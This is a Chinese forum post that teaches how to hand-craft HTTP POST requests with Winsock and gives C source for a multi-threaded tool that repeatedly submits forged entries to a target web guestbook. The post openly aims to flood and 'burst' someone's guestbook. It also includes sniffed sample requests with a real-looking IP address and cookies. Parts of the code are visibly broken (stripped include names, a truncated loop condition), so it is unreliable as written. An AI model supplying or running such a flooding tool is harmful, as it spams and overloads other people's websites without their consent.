设为首页 收藏本站

QQ登录

只需一步,快速开始

切换到宽版 切换风格

电脑疯子技术论坛|电脑极客社区

电脑疯子技术论坛|电脑极客社区»技术论坛 电脑疯子|资源分享 实用软件下载 帖子
微信扫一扫 分享朋友圈

已有 2327 人浏览分享

用Winsock实现对网站数据库的数据注入

[复制链接]
2327 1
  1. 在看这篇文章之前,有必要对"注入"一词阐述一下。区别于通常的SQL注入,这里的注入实际上只是构造HTTP请求报文,以程序的方式代替WEB提交页面,实现数据的自动提交。嘿嘿,我们只要写个循环,用什么语言你说了算,向特定的WEB页面发送HTTP报文,只要几分钟,他的本本就爆了,如下文:
  2. 首先,还是温习一下HTTP协议吧。我们在打开一个网站时,比如说http://www.163.com,实际上IE作为一个客户端,它将向服务器发送如下的请求报文(用sniffer截得的):
  3. GET / HTTP/1.1
  4. Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-
  5. powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
  6. Accept-Language: zh-cn
  7. Accept-Encoding: gzip, deflate
  8. User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
  9. Host: www.163.com
  10. Connection: Keep-Alive
  11. Cookie: NETEASE_SSN=jsufcz; NETEASE_ADV=11&22; Province=0; City=0; NTES_UV_COOKIE=YES
  12. 我们看到在以上的报文中,有很多字段,当然其中有很多并不是必须的,如果我们自己编程,只关心必要的就行了。在HTTP/1.1协议中规定了最小请求消息由方法字段(GET/POST/HEAD)和主机字段(HOST)构成。如上面的
  13. GET / HTTP/1.1
  14. HOST:www.163.com
  15. 但在HTTP/1.0中,HOST字段并不是必须的,这里为什么不能省,相信你也知道,不晓得的话也不打紧,接下来看。
  16. 为了向服务器发送数据,浏览器通常采用GET或POST方法向服务器提交报文。服务器在收到报文之后,解码分析出所需的数据并进行处理,最后返回结果。通常我们可以见到诸如http://xxx.xxx.xxx.xxx/show.asp?id=xxx的URL请求,我们可以自己构造如下的报文来完成
  17. GET /show.asp?id=xxx HTTP/1.1
  18. HOST:xxx.xxx.xxx.xxx
  19. 受URL长度1024的限制,采用GET方法只能提交少量的数据,假如我们在录入一篇文章时,这时就只能用到POST方法了。在讲解POST方法的一些要点之前,还是让大家来看一段POST请求报文,以致对POST报文有个大致的了解。(下面是我向某本本的留言,偶照样用sniffer截下来了)
  20. POST /gbook/add.php HTTP/1.1
  21. Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-
  22. powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwav
  23. e-flash, */*
  24. Referer: http://218.76.65.47/gbook/add.php
  25. Accept-Language: zh-cn
  26. Content-Type: application/x-www-form-urlencoded
  27. Accept-Encoding: gzip, deflate
  28. User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
  29. Host: 218.76.65.47
  30. Content-Length: 115
  31. Connection: Keep-Alive
  32. name=test&email=&comefrom=&homepage=&icq=&oicq=&image=say.gif&comment=test&passw
  33. ord=&doadd=%B7%A2%CB%CD%C1%F4%D1%D4
  34. 与GET方法相比,在字段下面多了一段内容,这就是我们向留言本提交的数据,如果有中文须经过urlencode编码。同样让我们省去不必要的字段,构造一个最小的POST请求
  35. POST /gbook/add.php HTTP/1.1
  36. Host: 218.76.65.47
  37. Content-Type: application/x-www-form-urlencoded
  38. Content-Length: 115
  39. name=test&email=&comefrom=&homepage=&icq=&oicq=&image=say.gif&comment=test&passw
  40. ord=&doadd=%B7%A2%CB%CD%C1%F4%D1%D4
  41. 上面的Content-Type字段表示为POST表单型的,Content-Length当然就是表示实体数据的长度了,这里都不能少,不然就无法正确接收了。这样,服务器端处理页面就会收到你提交的数据,并接收处理,如果是留言本的话就写入数据库了。若以很快的速度向某个本本发送这样的报文,实际上那个本本己经被你狂灌水了。
  42. 讲了客户端的发送,接下来就该讲服务器的接收问题了。
  43. 当报文数据到达服务器后,服务器底层进程进行接收并放入特定的缓冲区,同时置一些环境变量,如"CONTENT_LENGTH"、"QUERY_STRING"等,当然这其间还是屏蔽了一些底层细节的,如客户端提交的数据是怎么被重置到被请求页的标准输入的,之后高层应用程序如CGI、ASP、PHP等对其进行数据提取,其中CGI还须自己进行Unencode解码和字符串提取。假如向一ASP本本写留言,我提交了姓名(name)和内容(body)字段,且采用POST表单方式提交,在ASP程序中应如下进行接收:
  44. name=request.form("name")
  45. body=request.form("body")
  46. 并添加到数据库中
  47. rs.addnew
  48. rs("name")=name
  49. rs("body")=body
  50. rs.update
  51. 到此,该讲的也基本上讲完了,但有一点还要注意下,在发送报文时,在实体内容中还须加入提交按钮的"name=value"URLEncode编码,否则有可能不会写入数据库,Why ?I am finding the reason!
  52.  
  53.  
  54. 以下是相关的源代码:
  55. /*    encode.h    */
  56. /* Unencode URL编码函数 */
  57. /*
  58. 在这里要注意,编译器在处理中文字符时,会自动根据字符的位7来读入一个
  59. 或两个字符,这时可以强制采用unsigned char *来读入一个字符。
  60. */
  61. int isT(char ch)
  62. {
  63. if(ch==' '||ch=='%'||ch=='/'||ch&0x80) return 1;
  64. else return 0;
  65. }
  66. int encode(char *s,char *d)
  67. {
  68. if(!s||!d) return 0;
  69. for(;*s!=0;s++)
  70. {
  71. unsigned char *p=(unsigned char*)s;
  72. if(*p==' ')
  73. {
  74. *d='%';
  75. *(d+1)='2';
  76. *(d+2)='0';
  77. d+=3;
  78. }
  79. else if(isT(*p))
  80. {
  81. char a[3];
  82. *d='%';
  83. sprintf(a,"%02x",*p);
  84. *(d+1)=a[0];
  85. *(d+2)=a[1];
  86. d+=3;
  87. }
  88. else
  89. {
  90. *d=*p;
  91. d++;
  92. }
  93. }
  94. *d=0;
  95. return 1;
  96. }
  97. /* Unencode URL解码函数 */
  98. int unencode(char *s,char *d)
  99. {
  100. if(!s||!d) return 0;
  101. for(;*s!=0;s++)
  102. {
  103. if(*s=='+')
  104. {
  105. *d=' ';
  106. d++;
  107. }
  108. else if(*s=='%')
  109. {
  110. int code;
  111. if(sscanf(s+1,"%02x",&code)!=1) code='?';
  112. *d=code;
  113. s+=2;
  114. d++;
  115. }
  116. else
  117. {
  118. *d=*s;
  119. d++;
  120. }
  121. }
  122. *d=0;
  123. return 1;
  124. }
  125. /*  booksend.cpp  */
  126. /*    报文发送程序    */
  127. #include
  128. #include
  129. #include "encode.h"
  130. #include
  131. #pragma comment(lib,"ws2_32.lib")
  132. int checkpra(int argc,char *argv[]);
  133. void usage();
  134. DWORD WINAPI senddata(LPVOID lp);
  135. char ip[20]={0};
  136. USHORT port=0;
  137. char page[128]={0};
  138. char value[1024]={0};
  139. int ttime=1;
  140. int delaytime=2000;
  141. SOCKET sock;
  142. struct sockaddr_in sin;
  143. char sendbuf[1024*4]={0};
  144. void main(int argc,char *argv[])
  145. {
  146. if(checkpra(argc,argv)==-1) return;
  147. WSADATA wsa;
  148. if(WSAStartup(0x0202,&wsa)!=0)
  149. {
  150. printf("WSAStartup failed with error:%d\n",GetLastError());
  151. return;
  152. }
  153. sin.sin_family=AF_INET;
  154. if(inet_addr(ip)!=INADDR_NONE)
  155. sin.sin_addr.s_addr=inet_addr(ip);
  156. else
  157. {
  158. struct hostent *phost=gethostbyname(ip);
  159. if(phost==NULL)
  160. {
  161. printf("Resolve %s error!\n",ip);
  162. return;
  163. }
  164. memcpy(&sin.sin_addr,phost->h_addr_list[0],phost->h_length);
  165. }
  166. sin.sin_port=htons(port);
  167. char tempbuf[1024]={0};
  168. sprintf(tempbuf,"POST %s HTTP/1.1\n",page);
  169. strcpy(sendbuf,tempbuf);
  170. memset(tempbuf,0,sizeof(tempbuf));
  171. sprintf(tempbuf,"HOST: %s\n",ip);
  172. strcat(sendbuf,tempbuf);
  173. strcat(sendbuf,"Accept: image/gif, */*\n");
  174. strcat(sendbuf,"Content-Type: application/x-www-form-urlencoded\n");
  175. memset(tempbuf,0,sizeof(tempbuf));
  176. sprintf(tempbuf,"Content-Length: %d\n",strlen(value));
  177. strcat(sendbuf,tempbuf);
  178. strcat(sendbuf,"Connection: Keep-Alive\n\n");
  179. strcat(sendbuf,value);
  180. for(int i=0;i    {
  181. CreateThread(NULL,0,senddata,&i,0,NULL);
  182. Sleep(delaytime);
  183. }
  184. WSACleanup();
  185. }
  186. DWORD WINAPI senddata(LPVOID lp)
  187. {
  188. SOCKET sock=socket(AF_INET,SOCK_STREAM,0);
  189. if(sock==INVALID_SOCKET)
  190. {
  191. printf("Socket() failed with error:%d\n",GetLastError());
  192. return -1;
  193. }
  194. int ret;
  195. printf("State:Connecting...\n");
  196. ret=connect(sock,(struct sockaddr*)&sin,sizeof(sin));
  197. if(ret==SOCKET_ERROR)
  198. {
  199. printf("Connect() failed with error:%d\n",GetLastError());
  200. return -1;
  201. }
  202. printf("State:Connected!\n");
  203. printf("State:Sending...time %d ",*(int*)lp+1);
  204. ret=send(sock,sendbuf,strlen(sendbuf)+1,0);
  205. if(ret>0)
  206. printf("Send success!\n");
  207. else
  208. printf("Send error!\n");
  209. char recvbuf[1024*10]={0};
  210. ret=recv(sock,recvbuf,sizeof(recvbuf),0);
  211. if(strstr(recvbuf,"100")||strstr(recvbuf,"200")||strstr(recvbuf,"302"))
  212. printf("呵呵,注入成功啦!\n\n");
  213. else
  214. printf("注入有点问题哦,请查实一下!\n\n");
  215. closesocket(sock);
  216. return 1;
  217. }
  218. void usage()
  219. {
  220. char pathname[128]={0};
  221. GetModuleFileName(NULL,pathname,sizeof(pathname));
  222. char *p=pathname+strlen(pathname)-1;
  223. for(;*p!='\\';p--);
  224. printf("-------------------------------------------------------------------------------\n");
  225. printf("Usage:%s ip port page value [times] [delay]\n",p+1);
  226. printf("Code by JsuFcz--http://jsufcz.21xcn.net\n");
  227. printf("Ex:%s 10.0.0.169 80 /guestbk/add.php name=abc-body=hehe-doadd=发送留言",p+1);
  228. printf("-------------------------------------------------------------------------------\n");
  229. }
  230. int checkpra(int argc,char *argv[])
  231. {
  232. if(argc<5)
  233. {
  234. printf("错误的用法:至少应使用4个参数\n\n");
  235. usage();
  236. return -1;
  237. }
  238. else if(argc>6)
  239. {
  240. printf("错误的用法:最多只有6个参数\n\n");
  241. usage();
  242. return -1;
  243. }
  244. if(argc==6)
  245. {
  246. ttime=atoi(argv[5]);
  247. }
  248. if(argc==7)
  249. {
  250. ttime=atoi(argv[5]);
  251. delaytime=atoi(argv[6]);
  252. }
  253. strcpy(ip,argv[1]);
  254. port=atoi(argv[2]);
  255. strcpy(page,argv[3]);
  256. for(int i=0;argv[4][i]!=0;i++)
  257. {
  258. if(argv[4][i]=='-') argv[4][i]='&';
  259. if(argv[4][i]=='\'') argv[4][i]=' ';
  260. }
  261. encode(argv[4],value);
  262. return 0;
  263. }
  264. 以上代码已在VC6上编译通过
  265. 至此我们已经完成了。我们可以分享下技术,但是不要去干坏事哦。
复制代码

程序, 数据, 网站, 文章

相关帖子

举报

回复

评论 1

黑夜的星空 黑夜的星空  初级会员  发表于 2012-4-9 12:19:56 | 显示全部楼层
看看,学习学习{:3_231:}

举报

回复 支持 反对
返回列表
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

bek
管理员

1

关注

23

粉丝

2901

主题
精彩推荐
电脑疯子 GHOST WIN7 X64 快速装机版202001
电脑疯子 GHOST WIN7 X64 快速装机版202001
电脑疯子技术论坛GHOST WIN10X64 快速装机版201909
电脑疯子技术论坛GHOST WIN10X64 快速装机
电脑疯子 GHOST WIN7 X86 快速装机版202001
电脑疯子 GHOST WIN7 X86 快速装机版202001
电脑疯子技术论坛GHOST WIN10X86 快速装机版201909
电脑疯子技术论坛GHOST WIN10X86 快速装机
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.